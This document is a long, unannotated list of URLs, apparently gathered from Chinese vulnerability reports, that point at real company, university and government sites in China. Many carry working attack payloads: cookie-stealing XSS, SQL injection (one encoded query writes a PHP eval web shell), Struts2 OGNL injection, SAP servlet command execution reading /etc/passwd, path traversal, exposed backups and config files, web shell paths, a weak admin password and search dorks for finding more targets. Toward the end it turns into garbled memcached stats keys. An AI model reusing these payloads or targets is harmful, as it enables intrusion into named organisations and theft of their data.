http://www.duomai.com/index.php?m=siter_act&channel=&ads_cate=&apply_mode=&apply_status=&actname=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E http://mgs.homeinns.com/ http://mgs.homeinns.com/motelbbs/ www.hitachi.com.cn/hitachi.rar http://95598.js.sgcc.com.cn/95598/myspace/initPass.action http://news.qq.com/10/dreamlab.htm http://sae.sina.com.cn/网站利用自己的服务器,写js脚本 http://sae.sina.com/上的服务器应用部署的js,可以显示出在腾讯分站上登陆留言人的cookie值 http://www.xss.com/x.js http://www.qiushibaike.com/my/edit http://ptxyb.cuepa.cn/admin/admin_login.php http://ptxyb.cuepa.cn/admin/admin_login.php?tran=87efca281fd740e0c2b50a5b27bd711f370682ccdd503f39d4f2c1696e6472ffb9240c267258 http://homeinns.blog.sina.com.cn/search.php?art=88952634&author=88952634 http://dm.3gtv.letv.com http://user.roowei.com/user/login用户及商家登陆口 http://114.255.40.138 http://114.255.40.138/db.sql http://117.79.157.13/ http://117.79.157.13:80/cgi-bin/ast_vs_pre http://www.mediinfo.com.cn/ inurl:cms/Column.aspx?LMID= http://www.zchospital.com/cms/Column.aspx?LMID=1 http://www.zchospital.com/cms/Column.aspx?LMID=1 www.zchospital.com/cms/ www.zjqhyy.com/cms/ www.zjhl.org/cms www.ywzxyy.com/cms/ www.z2hospital.com/cms www.zjtongde.com/cms/ www.ks2y.com/cms/ nhdyyy.com/cms/ www.hnzyy.cn/cms/ www.zjukidney.com/cms/ www.zjukidney.com/cms/ http://back.adquan.com/article1.php?id=13831 http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 http://1dui1.huatu.com/index.php/OnlineDetail/?videoType=5&classtype=202&province=7&SubjectType=3&id=24976 http://office.homeinns.com/staffinfo/files/如家酒店集团通讯录%207.17.xlsx http://office.homeinns.com/staffinfo/files/%E6%9C%80%E6%96%B0%E5%85%AC%E5%8F%B8%E9%80%9A%E8%AE%AF%E5%BD%95.csv http://office.homeinns.com/staffinfo/ http://office.homeinns.com/staffinfo/contact.aspx http://www.beexiaomifeng.com/www.rar 
http://yangtian.lenovo.com.cn/yangtian.tar.gz http://bbs.eol.cn/config/config_ucenter.php.bak www.ylhrss.gov.cn http://www.ylhrss.gov.cn/indexAction.action http://rates.homeinns.com/Mains.aspx?city=tianjin&hotel=022026 http://emp.cnr.cn/milvote/ShowServlet?qid=1 http://www.hottickets.cn/new.php?id=15 http://gz.ip66.com/ http://113.107.24.234/admin/privilege.php?act=login http://tieba.baidu.com/bigscreen/fbs?tid=2642760579 http://tieba.baidu.com/f?ie=utf-8&kw=test http://tieba.baidu.com/game/index http://tieba.baidu.com/game/index?tab=lottery http://111.4.115.185/admin http://111.4.115.185//php.ini http://111.4.115.185//console/php/lib http://111.4.115.185//console/php/lib/cachecore/cacheapc.class.php ftp://111.4.115.185/ http://111.4.115.185/upload/404.php http://125.46.11.219 http://125.46.11.219/download/ http://quan.v5shop.com.cn http://quan.v5shop.com.cn/commond.aspx?id=100386 http://service.v5shop.com.cn http://service.v5shop.com.cn/help.aspx?id=185 http://account.xinli001.com/resetpwd/?username=用户邮箱&code=13846 http://125.46.11.218/ http://120.205.13.86:8888/login.action http://120.205.13.86:8888/login.action http://120.205.13.86:8888/shell.jsp http://taokebao.v5shop.com.cn/js_detailbuybutton.aspx?id=192 http://taokebao.v5shop.com.cn/js_detailspecstip.aspx?id=192 http://taokebao.v5shop.com.cn/productpic.aspx?id=154 inurl:js_detailbuybutton.aspx inurl:js_detailspecstip.aspx inurl:productpic.aspx inurl:productpic.aspx http://shop.optoma.com.cn/productpic.aspx?id=114 http://www.eglip.com/productpic.aspx?id=100540 http://ilikeulike.cn/productpic.aspx?id=1 http://www.hjqtc.com/productpic.aspx?id=1258 http://www.cs929.com/productpic.aspx?id=12 http://www.xiaokang.com/productpic.aspx?id=19678 http://www.yinbaojie.com/productpic.aspx?id=100422 http://www.wolifu.com/productpic.aspx?id=122833 http://www.echinasport.com/productpic.aspx?id=100370 http://www.biz-nbculture.com/productpic.aspx?id=100611 http://ws.roowei.com/max-admin/default.aspx http://v.dahe.cn/ 
http://corp.21cn.com/index_cloud.shtml http://www.qszkb.gov.cn/admint9vneqz.php http://www.hljts.gov.cn/web/ http://125.46.11.215/ http://www.hbcinemas.com.cn/main!mainEnter.action存在远程代码执行漏洞 http://old.homeinns.com/ http://www.zzbaike.com/zzbaike.zip http://95598.hn.sgcc.com.cn/fckeditor/editor/fckeditor.html http://info.seac.gov.cn:8888/seacwwwout/login.action http://info.seac.gov.cn:8888/seacwwwout/shell.jsp http://www.haitangshow.com/ http://124.238.218.103/section/141 office.homeinns.com/staffinfo/‎ office.homeinns.com/hcs/‎ office.homeinns.com/staffinfo/login.aspx http://office.homeinns.com http://jk.tiexue.net/index.php http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=EL1XCiQpJbb2fFtygNWUrtdD21YjwB6P http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=CW72aJu6%2bn2HgsitIbPjH1SFUXSq4ia%2f http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=QTTo2cYmaEw48d2a6fCN8yQTfM3gBqs5 http://scm.zte.com.cn/wms/Stat/QueryBoxBillInfoFrm.aspx?para1=ECC¶2=zh-CN¶3=GwyCPptlk5Oz6g31JvnAqAfjcQvwDe8j http://mgmt.motel168.com http://ucar.gac-toyota.com.cn/FB0401.aspx?AuthorNo=C37B1020131113008 http://bbs.auto.ifeng.com的uc_server弱口令123456 http://bbs.auto.ifeng.com/admin.php-》后台拿shell http://monitor.ruc.edu.cn/index.php http://www.xydpc.gov.cn/ http://video.sunland.org.cn/back/login.action https://my.ule.com/usr/sslvalidateLogin.do http://www.xss.com/x.js http://www.cmd5.com去破解居然是收费的擦, http://58.241.17.91:8002/detail.asp?bh=1'%22&dm=A&zfl= http://comic.tom.com/search.php http://bbs.comicdd.com/config/config_global.php.bak http://www.coremail.cn/blog/wp-login.php http://tvs.tcl.com/main/Login.aspx http://hi.189.cn/service/transaction/v5/esurfing/renew.jsp http://112.124.3.235:88/zte/index!dologin.action http://tclkt.etoway.cn/ http://tclkt.etoway.cn/web/SubmitLogin.do http://tclkt.etoway.cn/web/SubmitLogin.do http://taobao.fumu.com/robots.txt/1.php http://taobao.fumu.com/member/login.php 
http://taobao.fumu.com/member http://taobao.fumu.com/ask/question.php http://taobao.fumu.com//uploadfile/2013/1114/20131114092401208.swf/1.php http://j.esf.sina.com.cn/housereal/toupload?id=25423 http://www.360sky.com:80/announce.jsp?fileid=9343112 http://www.114school.cn/xytypt/fountain.showrefererurl.act?nodeid=100000 http://www.forbeschina.com/list/show_list.php?id=1909 http://www.hnnjj.gov.cn/FCKeditor//editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F../ http://open.weibo.com/blog diandian.com/inbox http://icp.sundns.com/index.php?option=forgetpass data:register=1&email=ds@q.c& http://www.homeinns.com/WEB-INF/web.xml http://old.homeinns.com/Present.rar http://www.111g.com/?ct=product&goods_id=118 http://www.111g.com/?ct=product&do=do http://www.libsys.com.cn/download.php?resulttype=SETUP http://yd.ad.tom.com/aaa.sql www.hljzx.gov.cn网站的“文章搜索”框存在SQL注入漏洞,参数为CMD。 http://www.bdgt.gov.cn/public/show.jsp?id=20130827161980 http://www.bj.10086.cn/service/promotion/yhjlb/ http://tclzmd.etwowin.com/ http://tclzmd.etwowin.com//web/SubmitLogin http://www.zjna.gov.cn/ http://www.zjna.gov.cn/ecoi/projectItem/initProjectInfo.action allinurl:initProjectInfo.action http://61.132.27.71/ecoi/projectItem/initProjectInfo.action http://221.6.158.154/ecoi/projectItem/initProjectInfo.action http://222.186.119.251/ecoi/projectItem/initProjectInfo.action http://218.3.88.115/ecoi/projectItem/initProjectInfo.action http://answer.tongyi.com/index.php/question/xxmyask?id=57664 http://answer.tongyi.com/index.php/question/xxmyask?id=57664 http://qc.homeinns.com/qc_trainning/login.aspx http://www.xdcms.cn http://jingchengzuoan.com/bbs/admin/login.asp http://office.homeinns.com/hcs/ http://office.homeinns.com/hcs/Configure/GetBackPassword.aspx http://www.crfeb03.com/upload_files/other/20131112231137doBLfe.php http://114.255.169.92/telecom/userloginAction/login.do http://114.255.169.92/telecom/errortishi.jsp 
http://xiangchengqu.roowei.com/adscontent/?ads_id=871 http://xiangchengqu.roowei.com/adscontent/?ads_id=871 http://netview.cnl.edu.cn http://netview.cnl.edu.cn/cacti/ http://www.fecb.com.cn/ http://bbs.gamebean.com admin:wanglirong http://www.dangao.com/ http://gd.cctv119.cn//plus/search.php?keyword=as&typeArr[1%20uNion%201]=a http://old.homeinns.com http://tfile.motel168.com/ShowHotelImage.aspx?type=1 http://mgmt.motel168.com/ShowHotelImage.aspx?type=1 http://hotel.motel168.com/ShowHotelImage.aspx?type=1 http://www.homeinns.com/queryProduct.html http://www.homeinns.com/queryProduct.html http://www.ln183.com http://www.ln183.com/db.asp http://www.ln183.com/1.rar http://callcenter.tcl.com http://callcenter.tcl.com/tclcc/portlets/downloading/jstbxzflow/queryDealer.do http://bbs.anzhuo.cn/config/config_ucenter.php.bak http://bbs.anzhuo.cn/config/config_global.php.bak http://www.ydpic.sgcc.com.cn/setup/index.jsp http://www.cupl.edu.cn:81/setup/index.jsp http://tuchong.com/ http://www.roowei.com/gg/comcount.php?action=up http://www.roowei.com/gg/comcount.php?action=up_jigou&u_id=190751 http://www.roowei.com/gg/comcount.php?action=up_host&c_id=656034 http://qingan.roowei.com/Search/?Keyword=&Level http://www.cn.roowei.com/Public/comcount.php?ac http://sdlc.roowei.com/Search/?Keyword=&Level=1 http://jiawang.roowei.com/Search/?Keyword=&Leve http://yushushi.roowei.com/Search/?Keyword=&Level=1&match=SPH_MATCH_ALL&Indexes=video&source=481&shendu=4&ac_parent=481 http://www.tclpabx.com/newslist.asp?ID=204 www.4008123456.com/tclcc/portlets/examine/begin.do?form_id=1 inurl:adminindex.jsp http://www.cre.cn/cms/site/cms_site_template_upload.jsp http://www.cupl.edu.cn:81/cms/site/cms_site_template_upload.jsp http://www.chinca.org/cms/cms/site/cms_site_template_upload.jsp http://app.eol.cn/app_info.php?id=48752 http://magazine.tcl.com/manager/login.aspx?ReturnUrl=%2fmanager%2fDefault.aspx http://www.hfssnq.com/admin/ http://www.1688gree.com/admin/ 
http://www.target.com/siteserver/service/background_taskLog.aspx?Keyword=test% http://bbs.9first.com/ http://bbs.500.com http://www.phpcms.cn/phpsso_server/caches/caches_admin/caches_data/pagelist_cache.php http://e.roowei.com/ www.dianping.com对外展示,可以盗取大量用户cookie,由于dianping认证基础是基于cookie的,危害灰常大哦 http://www.yitel.com/ http://www.yitel.com/HotelList/NewHotelInfo.aspx?hotelcd=029050 http://www.yitel.com/HotelList/YitelHotelList.aspx?Istype=2&CityCd=0411 http://link.admin5.com/1.zip api.cy.daoyoudao.com/app/diydishlist.do?groupid=11016&shopid=12112&curpage=1&pagesize=15&type=commend&clientid=201311201117453907286&versionrelease=ios_ www.china-isi.com http://stat.ccidnet.com//count/count.com.php?image=../../../../include.inc/config.inc.php http://stat.ccidnet.com//count/count.com.php?image=../../../../count/count.com.php http://tu.roowei.com/Album/Album.js.php?callback=success_chanpinlist&action=delete_l&Album_ID=6690&user=191389&_=1384928743815 http://cie.jlu.edu.cn/index.php?action=admin_login http://qc.homeinns.com/QuestionNaireLogin.aspx http://qc.homeinns.com/index.aspx http://www.gdass.gov.cn/member/list.php?modelid=10 http://m.jobui.com/changecity/city.php?code=170000 http://m.jobui.com/changecity/city.php?code=a www.shopin.net/datamonitor/supply_toSupply.action http://bbs.elecfans.com/config/config_ucenter.php.bak http://game.wo.com.cn/webroot.zip http://www.gbicom.cn/search.html?cid=25&field=sysp&keywords=%E5%B7%A5%E8%A3%85%E8%A3%A4 http://my.xizi.com/index.php?r=members/resetpwd&code=VgRXUlBTAQ==&verify=1 http://nanhai.hinews.cn/config/config_ucenter.php.bak http://sillymvc.googlecode.com/svn-history/r27/branches/iphoneapi/admin.mobile.house.sina.com.cn/include/class/api/sms/verify.class.php http://web-dev-start.googlecode.com/svn/trunk/ResumeHelper/login.sina.com.cn/Properties/AssemblyInfo.cs http://dps4u.googlecode.com/svn-history/r27/trunk/club.book.sina.com.cn/readme.txt http://www.decfc.dongfang.com/download/Commodity_Display.php?ID=1参数存在注入 
http://mail.hbpic.gov.cn/webmail/userapply.php?execadd=333&DomainID=111 http://mail.hbpic.gov.cn/webmail/fileshare.php?file=YWEnIHVuaW9uIHNlbGVjdCAxLDIsMyw0LDUsNiwnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4nLDgsOSwxMCwxMSwxMiwxMywxNCBpbnRvIG91dGZpbGUgJ0Q6L3VtYWlsL1dvcmxkQ2xpZW50L2h0bWwvMzYwLnBocCcj http://vv12580.com/login!login.action http://www.c123.com/reg.html http://czms.fhedu.cn/admin/ http://mgs.homeinns.com/motelbbs/ http://www.zscz.gov.cn http://www.zscz.gov.cn/vod.jsp?id=86 http://www.zscz.gov.cn/lindaoshow.jsp?idl=28 http://www.zscz.gov.cn/departmentshow.jsp?id=99 http://www.w3.org/1999/xhtml http://www.2cto.com/statics/css/reset.css http://www.2cto.com/statics/css/zh-cn-system.css http://www.2cto.com/statics/css/table_form.css http://www.2cto.com/statics/css/dialog.css http://ciefr.pku.edu.cn/soso.aspx?soso=a http://jira.staff.139.com/secure/project/ViewProjects.jspa http://gvshp503.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://gvshp503.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=ls%20-l http://ns.szsi.gov.cn/ http://ns.szsi.gov.cn/webmail/info.php http://www.urpsoft.com/pages/info_list.jsp?classcode=701 http://s.huanqiu.com/.svn/entries http://w.51mp3ring.com/12530.asp?ID=10260 http://w.51mp3ring.com/admin/login.asp http://www.sxpost.com.cn/userlist.asp http://www.sxpost.com.cn/Admin/Admin_login.asp http://www.sxpost.com.cn/Article/ShowArticle.asp http://www.ncie.gov.cn/userlist.asp http://www.ncie.gov.cn/admin/Admin_Login.asp http://www.gdofa.gov.cn https://auth.changyou.com/auth.zip http://data.sports.sohu.com http://data.sports.sohu.com/team_standings.php?search_phases_id=all&search_season_id=2007&_order=* http://www.cnnotary.cn/bbs/help.asp 
http://fuwu.sdjcy.gov.cn/article/articleWeb_doHyperLink.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.wahaha.com.cn/news/newsdetail.jsp?content_id=14 www.wahaha.com.cn http://zhangzhou.focus.cn//housemarket/bbs_search/index.php的post中存在问题 http://un.letv.com:2008/amdwmnew/jz/jz/jz/riqiquery.jsp http://un.letv.com:2008/amdwmnew/yw/yw/showdata.jsp http://oa.998.com/login/Login.jsp http://ypzs.bjda.gov.cn/ http://ypzs.bjda.gov.cn/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=whoami http://ypzs.bjda.gov.cn/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=netstat%20-an http://ypzs.bjda.gov.cn/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=net%20user http://301.peugeot.com.cn/img_down.php?p= http://www.glxy.chinamobile.com:8080/tims/admin/sys/login.aspx http://yunsha.topics.fumu.com/db/ bbs.fumu.com/config/config_ucenter.php.bak bt:/pentest/database/sqlmap# http://club.sohu.com//more/dahuasohu_cache.php?kindid=664 http://sqlmap.org http://www.wuhusrj.gov.cn/ http://www.wuhusrj.gov.cn/About.aspx?pTypeID=1 http://www.wuhusrj.gov.cn/NewsList.aspx?pTypeID=1 http://www.wuhusrj.gov.cn/TNewsList.aspx?pTypeID=1 http://erp.998.com/WebPortal_HotelFinance/FinanceErrorPage.aspx http://erp.998.com/WebPortal_HotelFinance/setAuthority.aspx http://erp.998.com/WebPortal_HotelFinance/FinanceAllHotelReport.aspx biz.finance.sina.com.cn/meeting/guestMeetingList.php?period_type=1&guest_id=2844 
biz.finance.sina.com.cn/meeting/guestMeetingList.php?period_type=1&guest_id=2844 http://www.course.sei.buaa.edu.cn/Users/。另外北航使用的都是1.1.3版本,似乎1.1.6版本这个bug已经修复了,谁知道呢,没人用1.1.6。下面详细讲说一下入侵过程: http://judge.sei.buaa.edu.cn/,另一个是http://crs.sei.buaa.edu.cn/,测试请到http://crs.sei.buaa.edu.cn/,学号stu,密码stu(这个账号和密码是在http://www.course.sei.buaa.edu.cn/demo/上对外公开的)。 http://www.gbicom.cn/passport/login页面注入 http://202.98.7.151:8080/CommunityCorrection/index.html http://system.greentree.com.cn:8080/test/aspx.aspx http://index.bitauto.com/index.bitauto.com.rar http://tee.sports.sohu.com/low.php?club=176 http://erp.998.com/WebPortal_HotelFinance/ http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130605.rar http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130607.rar http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130608.rar http://erp.998.com/WebPortal_HotelFinance/备份/WebPortal_HotelFinance20130807.rar http://www.jqw.cn/c.aspx?keyword=a http://s.haier.com/haierproject/fankui/style-ajax-get.php http://s.haier.com/haierproject/fankui/styl http://sqlmap.org http://www.gdwater.gov.cn:8080/xzxkpub/open/jdcx.searchList2.do http://www.bzxzfw.gov.cn:8080/articleView/articleView!show.action http://www.yumen.gov.cn:8080/web!getItem.action http://www.shandong.gov.cn/col/col4789/index.html http://m.dianping.com/ http://m.dianping.com http://www.liyi99.com/partener.do?_methodName=regist http://www.liyi99.com/picture/-1928514119_dama.jsp http://srm.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://srm.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=w http://bm.scs.gov.cn/2014/StudentLogin.aspx)后,会出现验证码,从Cookie中可以得到验证码。 http://www.siteserver.cn/exp/platform.html http://xss.**/00 http://www.hljdep.gov.cn:80/ www.hljdep.gov.cn 
http://data.sports.sohu.com/nba/nba_team_data.php?order_by=points_average&split=Total&stats=own http://kt.tcl.com/sql.rar http://kt.tcl.com/www.rar http://115.182.21.41:8080/ http://performance.wanda.cn/ www.8868.cn http://www.8868.cn/order/list?userType=1 http://www.8868.cn/order/list?userType=0 http://mail.moe.edu.cn/,并且支持邮箱WEB登陆方式,其中大多数政府管理账号,行政人员邮箱存在被社工隐患、 http://mail.moe.edu.cn http://mail.jdz.gov.cn/ http://mail.xinyu.gov.cn/ http://mail.jxfz.gov.cn/ http://mail.ganzhou.gov.cn/ http://mail.jiujiang.gov.cn/ http://mail.moe.edu.cn/ http://mail.customs.gov.cn/ http://mail.cpd.com.cn/ http://mail.court.gov.cn/ http://mail.npc.gov.cn/ http://mail.chinamil.com.cn/ https://mail.ruc.edu.cn http://travel.haier.com/travel/Hotel/SPHotelInfo/ChangePwd.aspx http://travel.haier.com/travel/BaseInfo/HotelSelect.aspx http://api.ea3w.com/active/vote/get_vote.php?callback=init_vote177699&id=177699 http://123.126.33.224:8080/resin-admin/index.php http://218.204.223.135/Home/Login http://blog.gd.sina.com.cn/bm/reg.php?gid=../../../../../../../../../../etc/passwd%00.jpg http://blog.gd.sina.com.cn/bm/reg.php?gid=../../../../../../../../../../proc/self/status%00.jpg http://bbs.hangzhou.com.cn/config/config_ucenter.php.bak http://bbs.hangzhou.com.cn/config/config_global.php.bak http://sfjd.miit.gov.cn/jsp/base/IndexAction.action http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 http://219.143.235.31/weatherWaringAction/seeDetailOfWarning.do?id=8a81819f422b28f201427d9d4fb96b83 http://gvshp501.haier.com/irj/portal http://gvshp501.haier.com http://gvshp501.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=cat%20/etc/passwd http://gvshp501.haier.com/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=netstat%20-antp http://www.jiaohuanlianjie.com/show.php?id=119171 
http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://ideaclub.lenovo.com.cn/club/index.php http://ideaclub.lenovo.com.cn/forum/forum.php?mod=viewthread&tid=2864&pid=8742&page=2&extra=#pid8742 http://chanye.hinews.cn/jdcp_page.php?xuh=1281 http://zt.hinews.cn/ghpage.php?xuh=12557 https://vip.lenovodata.com https://vip.lenovodata.com/images_per/login_pic1.jpg https://vip.lenovodata.com/images_per/login_pic1.jpg/1.php http://115.182.94.52:8080/resin-admin/index.php http://open.sogou.com/.svn/entries http://sappp1.haidilao.net:50000/ctc/servlet/com.sap.ctc.util.ConfigServlet?param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=netstat%20-an http://chinamobile.hinews.cn/page.php?xuh=100 http://115.182.51.183/html/encoder/index.html http://115.182.51.76/VIP/ http://diybbs.zol.com.cn/38/300_375261.html IP:166.111.4.39 http://www.rsta.tsinghua.edu.cn/search/qyjmxx.php?userid=293 http://www.rsta.tsinghua.edu.cn/search/zjhcxx.php?userid=285 http://pan.baidu.com/share/homerecord?channel=chunlei&clienttype=0&web=1&uk=419593849&num=100&t=1376889848238&page=1&dir=%2F&t=0.57795&order=time&desc=1&_=1376889848238 http://app.sogou.com/.svn/entries http://svn.sogou-inc.com/svn/userplatform/daohang/trunk/app/web http://svn.sogou-inc.com/svn/userplatform http://www.chinaceb.cn/infoview.aspx?iid=660 http://www.chinaceb.cn/xcharacters.aspx?id=2 http://www.wuyun.gov.cn:80/news_show.asp?NewsId=5203 http://219.143.235.85/ http://hi.baidu.com/huting/item/ea77c29727803f9e58146199 http://video.lenovo.com.cn/uc_server/admin.php items:1:number items:1:age items:1:evicted items:1:evicted_nonzero items:1:evicted_time items:1:outofmemory items:1:tailrepairs items:1:reclaimed items:2:number items:2:age items:2:evicted items:2:evicted_nonzero items:2:evicted_time items:2:outofmemory items:2:tailrepairs items:2:reclaimed items:3:number items:3:age items:3:evicted 
items:3:evicted_nonzero items:3:evicted_time items:3:outofmemory items:3:tailrepairs items:3:reclaimed items:4:number items:4:age items:4:evicted items:4:evicted_nonzero items:4:evicted_time items:4:outofmemory items:4:tailrepairs items:4:reclaimed items:5:number items:5:age items:5:evicted items:5:evicted_nonzero items:5:evicted_time items:5:outofmemory items:5:tailrepairs items:5:reclaimed items:6:number items:6:age items:6:evicted items:6:evicted_nonzero items:6:evicted_time items:6:outofmemory items:6:tailrepairs items:6:reclaimed items:7:number items:7:age items:7:evicted items:7:evicted_nonzero items:7:evicted_time items:7:outofmemory items:7:tailrepairs items:7:reclaimed items:8:number items:8:age items:8:evicted items:8:evicted_nonzero items:8:evicted_time items:8:outofmemory items:8:tailrepairs items:8:reclaimed items:9:number items:9:age items:9:evicted items:9:evicted_nonzero items:9:evicted_time items:9:outofmemory items:9:tailrepairs items:9:reclaimed items:10:number items:10:age items:10:evicted items:10:evicted_nonzero items:10:evicted_time items:10:outofmemory items:10:tailrepairs items:10:reclaimed items:11:number items:11:age items:11:evicted items:11:evicted_nonzero items:11:evicted_time items:11:outofmemory items:11:tailrepairs items:11:reclaimed items:12:number items:12:age items:12:evicted items:12:evicted_nonzero items:12:evicted_time items:12:outofmemory items:12:tailrepairs items:12:reclaimed items:13:number items:13:age items:13:evicted items:13:evicted_nonzero items:13:evicted_time items:13:outofmemory items:13:tailrepairs items:13:reclaimed items:14:number items:14:age items:14:evicted items:14:evicted_nonzero items:14:evicted_time items:14:outofmemory items:14:tailrepairs items:14:reclaimed items:15:number items:15:age items:15:evicted items:15:evicted_nonzero items:15:evicted_time items:15:outofmemory items:15:tailrepairs items:15:reclaimed items:16:number items:16:age items:16:evicted items:16:evicted_nonzero items:16:evicted_time 
items:16:outofmemory items:16:tailrepairs items:16:reclaimed items:17:number items:17:age items:17:evicted items:17:evicted_nonzero items:17:evicted_time items:17:outofmemory items:17:tailrepairs items:17:reclaimed items:18:number items:18:age items:18:evicted items:18:evicted_nonzero items:18:evicted_time items:18:outofmemory items:18:tailrepairs items:18:reclaimed items:19:number items:19:age items:19:evicted items:19:evicted_nonzero items:19:evicted_time items:19:outofmemory items:19:tailrepairs items:19:reclaimed items:20:number items:20:age items:20:evicted items:20:evicted_nonzero items:20:evicted_time items:20:outofmemory items:20:tailrepairs items:20:reclaimed items:22:number items:22:age items:22:evicted items:22:evicted_nonzero items:22:evicted_time items:22:outofmemory items:22:tailrepairs items:22:reclaimed items:23:number items:23:age items:23:evicted items:23:evicted_nonzero items:23:evicted_time items:23:outofmemory items:23:tailrepairs items:23:reclaimed items:24:number items:24:age items:24:evicted items:24:evicted_nonzero items:24:evicted_time items:24:outofmemory items:24:tailrepairs items:24:reclaimed wp_:category_relationships:25292 wp_:category_relationships:26381 wp_:category_relationships:22802 wp_:category_relationships:21064 wp_:category_relationships:21861 wp_:category_relationships:22677 wp_:category_relationships:26344 wp_:category_relationships:19610 wp_:post_tag_relationships:19610 wp_:category_relationships:21675 wp_:category_relationships:25292 wp_:category_relationships:25292 http://t.lejuopen.letv.com/api/nst.php http://115.182.21.51/login.php http://115.182.21.51/admin_manage_growth.php http://115.182.21.51/manage_all_site.php?website=true&ac=common&page=1 http://aobo.tcl.com/upimg_ok.asp http://219.143.235.90:80/ 
http://api.mobile.meituan.com/group/v1/user/503xxxxxx76/ordercenter/id?ci=xx&dealFields=imgurl%2Csmstitle%2Crefund%2Cmenu%2Ctitle%2Cbrandname%2Cprice%2Cvalue%2Cstatus%2Cend%2Crdcount%2Crdplocs%2Ctips%2Cslug%2Csubcate%2Cid&orderIds=26108xxxxx&token=oAi5-rtCVxxxxxxxxxxxxxdQdcasq&utm_campaign=AgroupBgroup&utm_content=4FDxxxxxxxxxxxxxxFC200B140FA&utm_medium=iphone&utm_source=AppStore&utm_term=4.0.3&uuid=4FDE1F0xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxB140FA http://guangchangwu.vcu.ku6.com http://robot.lenovo.com.cn/images/.svn/entries http://robot.lenovo.com.cn/images/ http://limit.bbyyt.com/center.html,页面弹出路由器登录框。 http://cb.baidu.com/ecom?di=xxxxxx&fn=BAIDU_CLB_SETJSONADSLOT&tpl=BAIDU_CLB_SETJSONADSLOT&asp_refer=页面内容如下: http://www.8868.cn/localmessage/messagecontent/347110/2/0 https://www.hn.10086.cn/Shopping/ordernews/page/queryBuyPhoneOrderDetails.action?orderNum=SC20130101395415113&phoneInfo.flag=001 https://shop.hn.chinamobile.com/Shopping/ordernews/page/querySelNumOrderDetails.action?ordernum=201301130110481410&flag=001 https://www.hn.10086.cn/Shopping/ordernews/page/queryBuyPhoneOrderDetails.action?orderNum=SC20130101395415113&phoneInfo.flag=001 http://122.225.200.160/ http://122.225.200.160:80/ http://www.target.com/siteserver/bbs/background_thread.aspx?UserName=test&Title='%20and%201=@@version%20and%201='&DateFrom=&DateTo=&ForumID=0 http://www.target.com/siteserver/bbs/background_post.aspx?UserName=&Title='%20and%20%201=@@version%20and%201='1&DateFrom=&DateTo=&ForumID=0 http://www.target.com/siteserver/bbs/background_user.aspx?UserGroup=7&PageNum=0&Keyword='%20and%201=@@version%20and%201='&CreationDate=0&LastActivityDate=0 http://wooyun.org/bugs/wooyun-2013-036072 http://www.dianping.com/member/jsonp/followUser?memberId=xxxxxx http://www.dianping.com/member/42915773/fans http://www.suning.com.cn/ListArticle.aspx?BID=31&RID=19 http://www.suning.com.cn/ListJob.aspx?BID=49&RID=1 http://www.suning.com.cn/ListPic.aspx?BID=1&DID=36&RID=5&SID=81 
